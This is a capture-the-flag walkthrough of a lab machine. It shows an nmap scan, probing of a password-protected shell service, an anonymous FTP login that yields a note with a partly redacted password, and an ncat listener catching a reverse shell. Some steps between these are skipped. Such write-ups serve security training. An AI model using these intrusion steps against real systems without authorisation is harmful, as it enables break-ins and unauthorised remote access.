# Nmap 7.91 scan initiated Mon Jul 26 11:24:16 2021 as: nmap -sSVC -p- -oA nmap_full -v -T 4 10.10.39.43 Nmap scan report for 10.10.39.43 Host is up (0.031s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA) | 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA) |_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519) 2375/tcp filtered docker 4420/tcp open nvm-express? | fingerprint-strings: | DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest: | INTERNAL SHELL SERVICE | please note: cd commands do not work at the moment, the developers are fixing it at the moment. | ctrl-c | Please enter password: | Invalid password... | Connection Closed | NULL, RPCCheck: | INTERNAL SHELL SERVICE | please note: cd commands do not work at the moment, the developers are fixing it at the moment. | ctrl-c |_ Please enter password: 8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27 |_http-title: Cat Pictures - Index page
We found an unusual service on port 4420, let's try to connect to it.
1 2 3 4 5 6 7 8 9 10 11 12
$ telnet catpictures.thm 4420 Trying 10.10.39.43... Connected to 10.10.39.43. Escape character is '^]'. INTERNAL SHELL SERVICE please note: cd commands do not work at the moment, the developers are fixing it at the moment. do not use ctrl-c Please enter password: password Invalid password... Connection Closed Connection closed by foreign host.
Right now we don't have credentials so let's try the web service instead.
$ ftp catpictures.thm Connected to catpictures.thm. 220 (vsFTPd 3.0.3) Name (catpictures.thm:noraj): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 162 Apr 02 14:32 note.txt 226 Directory send OK. ftp> get note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note.txt (162 bytes). 226 Transfer complete. 162 bytes received in 3,2e-05 seconds (4,83 Mbytes/s) ftp> quit 221 Goodbye.
$ cat note.txt In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is s<edited>t. - catlover
$ ncat -lvnp 9001 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.39.43. Ncat: Connection from 10.10.39.43:38828. bash: cannot set terminal process group (1609): Inappropriate ioctl for device bash: no job control in this shell I have no name!@cat-pictures:/# echo $SHELL echo $SHELL /bin/sh I have no name!@cat-pictures:/# echo $TERM echo $TERM dumb